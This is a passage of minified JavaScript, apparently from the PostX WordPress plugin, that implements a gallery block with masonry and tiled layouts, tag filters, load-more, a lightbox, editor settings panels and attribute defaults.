k(e){const[t,l]=u("Content"),{name:g,setAttributes:k,attributes:_,className:C,clientId:E,attributes:{blockId:S,allText:P,imgSize:L,imageList:I,advanceId:B,imgEffect:U,enableLink:M,tagStorage:A,previewImg:H,galleryType:N,glImgHeight:j,filterEnable:Z,loadMoreText:O,pageListData:R,imgAnimation:D,currentPostId:z,enableAllText:F,captionEnable:W,galleryColumn:V,enableLightBox:G,enableLoadMore:q,actionPosition:$,enableDownload:K,displayCaption:J,captionPosition:Y,galleryColumnGap:X,displayThumbnail:Q,postPerPageCount:ee,actionDisplayType:te,captionDisplayType:le,enableLightBoxOnImg:oe,defaultSelectedFilter:ae}}=e;let ie;if(c((()=>{const e=E.substr(0,6),t=h(f(E));(0,a.qi)(k,t,z,E),S?S&&S!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||k({blockId:e})):k({blockId:e})}),[E]),S&&(ie=(0,i.Kh)(_,"ultimate-post/gallery",S,(0,a.k0)())),H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:H});const[ne,re]=u(!0);c((()=>{setTimeout((()=>{re(!1)}),5e3)}),[]);const se=wp.data.select("core").getEntityRecords("postType","page",{per_page:-1});c((()=>{!(R&&JSON.parse(R)?.length>0)&&se?.length>0&&k({pageListData:JSON.stringify(se.map((e=>({id:e?.id,title:e.title.raw,link:e.link}))))})}),[se]);const pe={name:g,section:t,pageData:se,clientId:E,setSection:l,attributes:_,setAttributes:k,pageListData:R},ce=m(null),[ue]=(0,n.Z)(),de=Number(X[ue])||0,me=Number(j[ue]),ge=me+de,ye=Number(V[ue]),be=ce?.current?.getBoundingClientRect().width;let ve=JSON.parse(I);const he=JSON.parse(I),fe=A&&JSON.parse(A)?.length>0?JSON.parse(A):[],[ke,we]=u(0),[xe,Te]=u([]),[_e,Ce]=u([]),[Ee,Se]=u(0),[Pe,Le]=u(0);c((()=>{if(Ee==ve?.length){if(Le(0),"masonry"==N){const e=()=>{if(!ce.current)return;const e=ye,t=(be-(e-1)*de)/e;we(t);const l=Array(e).fill(0),o=[];ve.forEach(((e,a)=>{const i=window.frames["editor-canvas"]?.document?.getElementById(`img-${a+S}`),n=document.getElementById(`img-${a+S}`)||i;if(!n)return;n.style.maxWidth=`${t}px`;const r=n.getBoundingClientRect().height,s=l.indexOf(Math.min(...l)),p=l[s],c=s*(t+de);o[a]={top:p,left:c},l[s]+=r+de})),Te(o),Le(Math.max(...l))},t=requestAnimationFrame(e),l=()=>{requestAnimationFrame(e)};return window.addEventListener("resize",l),()=>{cancelAnimationFrame(t),window.removeEventListener("resize",l)}}if("tiled"==N){const e=()=>{const e=ve.map((e=>{const{width:t,height:l}=(e=>{const t=new Image;return t.src=e,t.complete?{width:t.width,height:t.height}:{width:100,height:100}})(e?.sizes[L]?.url.length>0?e?.sizes[L]?.url:e.url);return t/l})),t=[];for(let l=0;l<ve?.length;l+=ye)t.push({images:ve.slice(l,l+ye),aspectRatios:e.slice(l,l+ye)});let l=0;t.forEach(((e,t)=>{l=l+me+de})),Le(l-de);const o=t.flatMap(((e,t)=>{const l=((e,t,l)=>{const o=e.reduce(((e,t)=>e+t),0),a=de/2/l*100,i=100-2*a*(e.length-1),n=e.map((e=>e/o*i));return n.map(((e,l)=>{const o=0===l?0:n.slice(0,l).reduce(((e,t)=>e+t),0)+2*a*l;return{maxWidth:"100%",top:t*ge+"px",left:`${o}%`,width:`${e}%`,height:`${me}px`,position:"absolute"}}))})(e.aspectRatios,t,be);return e.images.map(((e,t)=>l[t]))}));Ce(o)};e()}}else Se(ve?.length)}),[de,ue,I,me,N,Ee,V,be,ve?.length,Y,X,ae,ee[ue]]),ve=ae?.length?ve&&ve?.length&&ve?.filter((e=>e?.tag?.includes(ae))):ve;const Ie=ve,Be=Number(ee[ue]),[Ue,Me]=u(!1),[Ae,He]=u(Be),[Ne,je]=u(Be%ye);c((()=>{He(Be),je(Be%ye)}),[Be]),(q&&Ae<JSON.parse(I)?.length||Z&&fe&&fe?.length>0&&q&&Ae<ve?.length)&&(ve=ve.slice(0,Ae));const[Ze,Oe]=u({}),[Re,De]=u(0),ze=(e,t)=>{Oe(e),De(t)},Fe={enableLoadMore:q,loadMoreCount:Ae,defaultSelectedFilter:ae,tagList:fe,imageList:I,LoadMoreSpinner:Ue,handleLoadMore:()=>{Me(!0),setTimeout((()=>{Me(!1)}),1100),Ne&&Ne>0?(He((e=>e+ye-Ne)),je(!1)):He((e=>e+3))},setAttributes:k,loadMoreText:O,afterFilterItem:Ie},We=v({...B&&{id:B},className:`ultp-block-${S} ${C}`});return(0,o.createElement)(d,null,(0,o.createElement)(p.Z,{store:pe,images:JSON.parse(I),handleAddMedia:e=>{e?.length>0&&k({imageList:JSON.stringify(e.map((e=>({id:e?.id,url:e?.url,alt:e?.alt,sizes:e?.sizes?e?.sizes:[],caption:e.caption}))))})}}),(0,o.createElement)("div",We,ie&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ie}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},!ve?.length&&!(he.length>0)&&(0,o.createElement)(y,null,(0,o.createElement)(b,{gallery:!0,multiple:!0,labels:{title:"Create Gallery"},onSelect:e=>{e?.length>0&&k({imageList:JSON.stringify(e.map((e=>({id:e?.id,url:e?.url,alt:e?.alt,caption:e.caption,sizes:e?.sizes?e?.sizes:[]}))))})},accept:"image/*",allowedTypes:["image"],value:JSON.parse(I).map((e=>e?.id?e?.id:""))})),Z&&ve&&ve?.length>0&&(0,o.createElement)(w,{allText:P,tagList:fe,setAttributes:k,enableAllText:F,defaultSelectedFilter:ae}),(0,o.createElement)("div",{className:"ultp-gallery-wrapper",style:{height:ne&&ve?.length>0?"500px":"",opacity:Ue?"0.2":"1"}},ve?.length>0&&(0,o.createElement)("div",{ref:ce,className:`ultp-gallery-container ultp-gallery-${N}`,style:{position:"relative",opacity:ne?"0":"1",height:"grid"==N?"auto":Pe||"auto"}},ve.map(((e,t)=>{let l=!1,a=!1;if(xe?.length>0&&(l=xe[t]?.top||0,a=xe[t]?.left||0),e?.id)return(0,o.createElement)("div",{key:e.id,id:`img-${t+S}`,className:"ultp-gallery-item",style:"tiled"===N?_e[t]||{}:{top:l,left:a},onClick:()=>{oe&&!G&&ze(e,t)}},(0,o.createElement)("div",{className:`ultp-gallery-media ultp-action-${te} ${W?`ultp-caption-${Y} ultp-caption-${le}`:""}`},(0,o.createElement)("div",{className:"ultp-gallery-media__img-container"},(0,o.createElement)("div",{className:`ultp-image-block ultp-block-image-${D} ultp-gallery-${U}`},(0,o.createElement)("img",{alt:e?.alt,src:e?.sizes[L]&&e?.sizes[L]?.url?e?.sizes[L]?.url:e?.url,onLoad:()=>Se((e=>e+1))}))),W&&e.caption?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-media__caption-container"},(0,o.createElement)("div",{className:"ultp-gallery-media__caption"},e.caption)),(0,o.createElement)("div",{className:`ultp-gallery-action-container ultp-action-${$}`},(0,o.createElement)("div",{className:"ultp-gallery-action"},K&&r.ZP.download_line,G&&oe&&(0,o.createElement)("div",{onClick:()=>ze(e,t)},r.ZP.plus),M&&e?.link?.length>0&&r.ZP.link))))}))),(0,o.createElement)(T,{images:ve,blockLoader:ne})),!(ve.length>0)&&he.length>0&&ae.length>0&&(0,o.createElement)("div",{className:"ultp-no-gallery-message",style:{display:"block"}},"No Gallery item found"),(0,o.createElement)(x,{LoadMoreData:Fe}),Ze?.url?.length>0&&(0,o.createElement)(s.Z,{displayCaption:J,lightboxIndex:Re,setLightBoxIndex:De,activeLightBox:Ze,setActiveLightBox:Oe,displayThumbnail:Q,images:ve}))))}const w=({tagList:e,allText:t,setAttributes:l,enableAllText:a,defaultSelectedFilter:i})=>{const n=e=>{l({defaultSelectedFilter:e})};return(0,o.createElement)("div",{className:"ultp-gallery-filter"},a&&t?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-filter__item "+(""==i?"active-gallery-filter":""),onClick:()=>n(""),dangerouslySetInnerHTML:{__html:t}}),e.map((e=>(0,o.createElement)("div",{key:e,className:"ultp-gallery-filter__item "+(i==e?"active-gallery-filter":""),onClick:()=>n(e)},e))))},x=({LoadMoreData:{enableLoadMore:e,loadMoreCount:t,defaultSelectedFilter:l,tagList:a,imageList:i,LoadMoreSpinner:n,handleLoadMore:r,setAttributes:s,loadMoreText:p,afterFilterItem:c}})=>(0,o.createElement)(d,null,e&&t<JSON.parse(i)?.length&&!a.includes(l)&&(0,o.createElement)("div",{style:{opacity:n?"0.5":"1"}},(0,o.createElement)(g,{key:"editable",tagName:"div",className:"ultp-gallery-loadMore",keeplaceholderonfocus:"true",placeholder:__("Load More Text…","ultimate-post"),onClick:()=>r(),onChange:e=>s({loadMoreText:e}),value:p})),e&&t<c?.length&&a.includes(l)&&(0,o.createElement)("div",{style:{opacity:n?"0.5":"1"}},(0,o.createElement)(g,{key:"editable",tagName:"div",className:"ultp-gallery-loadMore",keeplaceholderonfocus:"true",placeholder:__("Load More Text…","ultimate-post"),onClick:()=>r(),onChange:e=>s({loadMoreText:e}),value:p}))),T=({blockLoader:e,images:t})=>(0,o.createElement)(d,null,(0,o.createElement)("div",{className:"gallery-postx "+(e&&t?.length>0?"gallery-active":"")},(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"})))},75938:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766);const{useEffect:i,useState:n,useRef:r}=wp.element,s=({images:e,lightboxIndex:t,activeLightBox:l,displayCaption:s,setActiveLightBox:p,setLightBoxIndex:c,displayThumbnail:u})=>{const[d,m]=n(!0),[g,y]=n(1),b=l=>{let o=t;o="left"===l?0===t?e?.length-1:t-1:(t+1)%e?.length,c(o),p(e[o])},v=r(null),h=r({rightIcon:null,leftIcon:null,control:null,gallery:null}),f=r(null);return i((()=>{const e=e=>{const{rightIcon:t,leftIcon:l,control:o,gallery:a}=h.current;!v.current||v.current.contains(e.target)||!t||t.contains(e.target)||!l||l.contains(e.target)||!o||o.contains(e.target)||u&&(!a||a.contains(e.target))||p({})};return document.addEventListener("mousedown",e),()=>{document.removeEventListener("mousedown",e)}}),[]),(0,o.createElement)("div",{className:"ultp-gallery-lightbox",ref:f},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__control",ref:e=>h.current.control=e},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__full-screen"},a.ZP?.full_screen),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__zoom-in",onClick:()=>y(g+.5)},a.ZP?.zoom_in),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__zoom-out",onClick:()=>y(g-.5)},a.ZP?.zoom_out),(0,o.createElement)("div",{onClick:()=>p({}),className:"ultp-gallery-lightbox__close"},a.ZP?.close_line),u&&(0,o.createElement)("div",{className:"ultp-gallery-lightbox__indicator-control",onClick:()=>m(!d)},a.ZP?.gallery_indicator)),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__inside"},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__content"},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__left-icon",onClick:()=>b("left"),ref:e=>h.current.leftIcon=e},a.ZP?.leftArrowLg),(0,o.createElement)("div",{className:"ultp-lightbox__img-container",ref:v},(0,o.createElement)("img",{className:"ultp-lightbox__img",style:{transform:`scale(${g})`,position:"relative",zIndex:"99999999999999999999999999999"},src:l?.url,alt:l?.alt}),s&&l?.caption&&l?.caption?.length>0&&(0,o.createElement)("span",{className:"ultp-lightbox__caption"},l.caption)),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__right-icon",onClick:()=>b("right"),ref:e=>h.current.rightIcon=e},a.ZP?.rightArrowLg)),u&&(0,o.createElement)("div",{className:"ultp-gallery-lightbox__gallery",ref:e=>h.current.gallery=e},d&&e.map(((e,t)=>(0,o.createElement)("div",{className:"ultp-gallery-lightbox__gallery-item "+(l.id==e.id?"lightbox-active":""),onClick:()=>((e,t)=>{p(e),c(t)})(e,t)},(0,o.createElement)("img",{src:e.sizes.thumbnail?.url,alt:e?.alt})))))))}},82110:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{useBlockProps:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,displayCaption:n,displayThumbnail:r,captionEnable:s,enableLightBoxOnImg:p,imageList:c,galleryType:u,lazyLoading:d,enableLoadMore:m,loadMoreText:g,tagStorage:y,defaultSelectedFilter:b,enableAllText:v,allText:h,enableDownload:f,enableLightBox:k,enableLink:w,actionPosition:x,captionPosition:T,actionDisplayType:_,captionDisplayType:C,imgEffect:E,imgAnimation:S,imgSize:P,filterEnable:L}=e.attributes,I=JSON.parse(c);let B=y&&JSON.parse(y)?.length>0?JSON.parse(y):[];if(!I?.length)return null;L||(B=[]);const U=i.save({...l&&{id:l},className:`ultp-block-${t} ultpMenuCss`});return(0,a.createElement)("div",(0,o.Z)({},U,{"data-bid":t,"data-lightbox":p,"data-caption":n,"data-indicators":r}),(0,a.createElement)("div",{className:"ultp-gallery-wrapper"},(0,a.createElement)("div",{className:"ultp-gallery-lightbox__control"},(0,a.createElement)("div",{className:"ultp-gallery-lightbox__full-screen"},"_ultp_gl_ic_full_screen_ultp_gl_ic_end_"),(0,a.createElement)("div",{className:"ultp-gallery-lightbox__zoom-in"},"_ultp_gl_ic_zoom_in_ultp_gl_ic_end_"),(0,a.createElement)("div",{className:"ultp-gallery-lightbox__zoom-out"},"_ultp_gl_ic_zoom_out_ultp_gl_ic_end_"),(0,a.createElement)("div",{className:"ultp-gallery-lightbox__close"},"_ultp_gl_ic_close_line_ultp_gl_ic_end_"),r&&(0,a.createElement)("div",{className:"ultp-gallery-lightbox__indicator-control"},"_ultp_gl_ic_gallery_indicator_ultp_gl_ic_end_")),B&&B?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-filter"},v&&h?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-filter__item active-gallery-filter",dangerouslySetInnerHTML:{__html:h}}),B.map((e=>(0,a.createElement)("div",{key:e,"data-tag":e,className:"ultp-gallery-filter__item "+(b==e?"active-gallery-filter":"")},e)))),(0,a.createElement)("div",{className:`ultp-gallery-container ultp-gallery-${u}`},I.map(((e,t)=>(0,a.createElement)("div",{key:e?.id,id:`img-${t}`,"data-id":e?.id,"data-index":t,className:"ultp-gallery-item","data-tag":e?.tag?.join(","),"data-caption":e?.caption?.length>0?e?.caption:"",style:{position:"masonry"==u?"absolute":"relative"}},(0,a.createElement)("div",{className:`ultp-gallery-media ultp-action-${_} ${s?`ultp-caption-${T} ultp-caption-${C}`:""}`},(0,a.createElement)("div",{className:"ultp-gallery-media__img-container"},(0,a.createElement)("div",{className:`ultp-image-block ultp-block-image-${S} ultp-gallery-${E}`},(0,a.createElement)("img",{loading:d?"lazy":"",src:e?.sizes[P]&&e?.sizes[P]?.url?e?.sizes[P]?.url:e?.url,alt:e.alt}))),s&&e.caption?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-media__caption-container"},(0,a.createElement)("div",{className:"ultp-gallery-media__caption"},e.caption)),(0,a.createElement)("div",{className:`ultp-gallery-action-container ultp-action-${x}`},(0,a.createElement)("div",{className:"ultp-gallery-action"},f&&(0,a.createElement)("a",{href:e?.url,download:e?.url},"_ultp_gl_ic_download_line_ultp_gl_ic_end_"),k&&p&&(0,a.createElement)("div",{className:"ultp-gallery-lightbox","data-index":t,"data-id":e.id,"data-img":e?.url},"_ultp_gl_ic_plus_ultp_gl_ic_end_"),w&&e?.link?.length>0&&(0,a.createElement)("a",{href:e?.link,target:e?.newTab?"_blank":"_self"},"_ultp_gl_ic_link_ultp_gl_ic_end_")))))))),m&&g?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-loadMore",dangerouslySetInnerHTML:{__html:g}})))}},65638:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(43581),s=l(31760),p=l(49540);const{__}=wp.i18n,{Toolbar:c}=wp.components,{InspectorControls:u}=wp.blockEditor,{MediaUpload:d,BlockControls:m,MediaUploadCheck:g}=wp.blockEditor,y=({store:e,images:t,handleAddMedia:l})=>{const{tagStorage:y,imageList:b}=e?.attributes,v=y&&JSON.parse(y)?.length>0?JSON.parse(y)?.sort(((e,t)=>e.value-t.value)).map((e=>({value:`${e}`,label:__(`${e}`,"ultimate-post")}))):[];return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(m,null,(0,o.createElement)(c,{className:"ultp-gallery-toolbar-group ultp-menu-toolbar-group"},(0,o.createElement)(g,null,(0,o.createElement)(d,{gallery:!0,multiple:!0,onSelect:l,allowedTypes:["image"],value:JSON.parse(b).map((e=>e?.id?e?.id:"")),render:({open:e})=>(0,o.createElement)("div",{className:"ultp-menu-toolbar-add-item",onClick:e},i.Z.plus,(0,o.createElement)("div",{className:"__label"},__("Add Item","ultimate-post")))})))),(0,o.createElement)(u,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8951",store:e}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"settings",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"group",key:"galleryType",options:[{label:"Grid",value:"grid"},{label:"Tiled",value:"tiled"},{label:"Masonry",value:"masonry"}],justify:!0,label:__("Gallery Type","ultimate-post"),help:__("Tiled & Masonry Depend on Image width","ultimate-post")}},{position:2,data:{type:"range",key:"galleryColumn",label:__("Gallery Column","ultimate-post"),min:1,max:12,step:1,unit:!1,responsive:!0}},{position:3,data:{type:"range",key:"galleryColumnGap",label:__("Gap","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0}},{position:4,data:{type:"select",key:"imgSize",label:__("Image Size","ultimate-post"),options:[{value:"full",label:__("Full Size","ultimate-post")},{value:"thumbnail",label:__("Thumbnail","ultimate-post")},{value:"medium",label:__("Medium","ultimate-post")},{value:"large",label:__("Large","ultimate-post")}]}},{position:5,data:{type:"toggle",key:"lazyLoading",label:__("Lazy Loading","ultimate-post")}},{position:6,data:{type:"range",key:"glImgHeight",min:0,max:1200,step:1,unit:!1,responsive:!0,label:__("Image Height","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(p.Z,{store:e,attr:e.attributes,setAttributes:e.setAttributes,images:t}),(0,o.createElement)(a.T,{depend:"captionEnable",title:__("Caption","ultimate-post"),include:[{position:2,data:{type:"select",key:"captionPosition",label:__("Caption Position","ultimate-post"),options:[{value:"top",label:__("Image on Top","ultimate-post")},{value:"middle",label:__("Image on Middle","ultimate-post")},{value:"bottom",label:__("Image on Bottom","ultimate-post")},{value:"outside-below",label:__("Outside Below Image","ultimate-post")},{value:"outside-top",label:__("Outside Top Image","ultimate-post")}]}},{position:3,data:{type:"select",key:"captionDisplayType",label:__("Display Type","ultimate-post"),options:[{value:"onHover",label:__("Show on Hover","ultimate-post")},{value:"visible",label:__("Always Visible","ultimate-post")},{value:"offHover",label:__("Hide on hover","ultimate-post")}]}},{position:4,data:{type:"alignment",disableJustify:!0,key:"captionAlignment",label:__("Alignment ( Conditional with Position )","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{depend:"enableLightBoxOnImg",title:__("Lightbox","ultimate-post"),include:[{position:2,data:{type:"toggle",key:"displayCaption",label:__("Display Captions","ultimate-post")}},{position:3,data:{type:"toggle",key:"displayThumbnail",label:__("Display Thumbnails","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Filter ( Pro )","ultimate-post"),include:[{position:1,data:{pro:!0,type:"toggle",key:"filterEnable",label:__("Enable Filter","ultimate-post")}},{position:2,data:{type:"toggle",key:"enableAllText",label:__('Enable "All"',"ultimate-post")}},{position:3,data:{type:"text",key:"allText",label:__('"All" Text',"ultimate-post")}},{position:4,data:{type:"select",key:"defaultSelectedFilter",label:__("Default Selected Filter","ultimate-post"),options:v?.length>0?v:[]}},{position:5,data:{type:"text",key:"notFoundContent",label:__("Not Found Content","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{depend:"enableLoadMore",title:__("Load More","ultimate-post"),include:[{position:2,data:{type:"range",key:"postPerPageCount",min:0,max:20,step:1,responsive:!0,label:__("Post Per Page Count","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Action","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"enableLink",label:__("Enable Link","ultimate-post")}},{position:2,data:{type:"toggle",key:"enableLightBox",help:"Need To Enable Lightbox Settings",label:__("Enable Light Box","ultimate-post")}},{position:3,data:{type:"toggle",key:"enableDownload",label:__("Enable Download","ultimate-post")}},{position:4,data:{type:"select",key:"actionPosition",label:__("Position","ultimate-post"),options:[{value:"top",label:__("Image on Top","ultimate-post")},{value:"middle",label:__("Image on Middle","ultimate-post")},{value:"bottom",label:__("Image on Bottom","ultimate-post")},{value:"outside-below",label:__("Outside Below Image","ultimate-post")},{value:"outside-top",label:__("Outside Top Image","ultimate-post")}]}},{position:5,data:{type:"select",key:"actionDisplayType",label:__("Display Type","ultimate-post"),options:[{value:"onHover",label:__("Show on Hover","ultimate-post")},{value:"visible",label:__("Always Visible","ultimate-post")},{value:"offHover",label:__("Hide on hover","ultimate-post")}]}},{position:6,data:{type:"alignment",key:"actionAlignment",disableJustify:!0,label:__("Alignment ( Conditional with Position )","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(n.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:__("Images","ultimate-post"),include:[{position:2,data:{type:"select",key:"imgAnimation",label:__("Image Hover","ultimate-post"),options:[{value:"",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"roateLeft",label:__("Rotate Left","ultimate-post")},{value:"rotateRight",label:__("Rotate Right","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]}},{position:3,data:{type:"select",key:"imgEffect",label:__("Image Effect","ultimate-post"),options:[{value:"",label:__("None","ultimate-post")},{value:"grayscale",label:__("Grayscale","ultimate-post")},{value:"sepia",label:__("Sepia","ultimate-post")},{value:"saturate",label:__("Saturate","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"vintage",label:__("Vintage","ultimate-post")},{value:"earlybird",label:__("Earlybird","ultimate-post")},{value:"toaster",label:__("Toaster","ultimate-post")},{value:"myfair",label:__("Myfair","ultimate-post")}]}},{position:4,data:{type:"border",key:"imgBorder",label:__("Border","ultimate-post")}},{position:5,data:{type:"dimension",key:"imgRadius",step:1,unit:!0,responsive:!0,label:__("Image Border Radius","ultimate-post")}},{position:6,data:{type:"boxshadow",key:"imgShadow",step:1,unit:!0,responsive:!0,label:__("Image Box shadow","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Caption Style","ultimate-post"),include:[{position:1,data:{type:"typography",key:"captionTypography",label:__("Typography","ultimate-post")}},{position:2,data:{type:"color",key:"captionColor",label:__("Color","ultimate-post")}},{position:3,data:{type:"color",key:"captionOverlayBg",label:__("Overlay Background","ultimate-post")}},{position:4,data:{type:"dimension",key:"captionPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Action","ultimate-post"),include:[{position:1,data:{type:"range",key:"actionIconSize",label:__("Icon Size","ultimate-post"),min:1,max:120,step:1,unit:!1,responsive:!0}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"actionColor",label:__("Color","ultimate-post")},{type:"color",key:"actionBg",label:__("Background","ultimate-post")},{type:"border",key:"actionBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"actionRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"actionHoverColor",label:__("Color","ultimate-post")},{type:"color",key:"actionHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"actionHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"actionHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}},{position:3,data:{type:"dimension",key:"actionPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:4,data:{type:"dimension",key:"actionMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:5,data:{type:"range",key:"actionSpaceBetween",min:0,max:100,step:1,responsive:!0,label:__("Spacing Between","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Load More","ultimate-post"),include:[{position:1,data:{type:"typography",key:"loadMoreTypo",label:__("Typography","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"loadMoreColor",label:__("Color","ultimate-post")},{type:"color",key:"loadMoreBg",label:__("Background","ultimate-post")},{type:"border",key:"loadMoreBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"loadMoreRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"loadMoreHoverColor",label:__("Color","ultimate-post")},{type:"color",key:"loadMoreHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"loadMoreHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"loadMoreHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}},{position:3,data:{type:"dimension",key:"loadMorePadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:4,data:{type:"range",key:"loadMoreSpacing",min:0,max:100,step:1,responsive:!0,label:__("Spacing Between","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Filter (Pro) Style","ultimate-post"),include:[{position:1,data:{type:"typography",key:"filterTypography",label:__("Typography","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"filterColor",label:__("Color","ultimate-post")},{type:"color",key:"filterBg",label:__("Background","ultimate-post")},{type:"border",key:"filterBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"filterRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"filterShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"filterHoverColor",label:__("Color","ultimate-post")},{type:"color",key:"filterHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"filterHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"filterHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"filterHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}]}]}},{position:2,data:{type:"dimension",key:"filterPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:3,data:{type:"dimension",key:"filterMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:4,data:{type:"range",key:"filterGap",label:__("Gap","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0}},{position:5,data:{type:"alignment",disableJustify:!0,key:"filterAlignment",label:__("Alignment","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))),(0,o.createElement)(s.Z,{include:[{type:"template"}],store:e}))}},50315:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={customCssVariable:{type:"string",default:""},blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},galleryType:{type:"string",default:"grid"},imageList:{type:"string",default:"[]"},tagStorage:{type:"string",default:"[]"},pageListData:{type:"string",default:"[]"},galleryColumn:{type:"object",default:{lg:"3",sm:"2"},style:[{depends:[{key:"galleryType",condition:"==",value:"grid"}],selector:"{{ULTP}} .ultp-gallery-grid { grid-template-columns: repeat({{galleryColumn}}, 1fr); --ultp-gallery-columns: {{galleryColumn}};   }"},{depends:[{key:"galleryType",condition:"==",value:"masonry"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-columns: {{galleryColumn}}; }"},{depends:[{key:"galleryType",condition:"==",value:"tiled"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-columns: {{galleryColumn}}; }"}]},galleryColumnGap:{type:"object",default:{lg:"20"},style:[{depends:[{key:"galleryType",condition:"==",value:"grid"}],selector:"{{ULTP}} .ultp-gallery-grid { gap: {{galleryColumnGap}}px }"},{depends:[{key:"galleryType",condition:"==",value:"masonry"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-gap: {{galleryColumnGap}}; }"},{depends:[{key:"galleryType",condition:"==",value:"tiled"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-gap: {{galleryColumnGap}}; 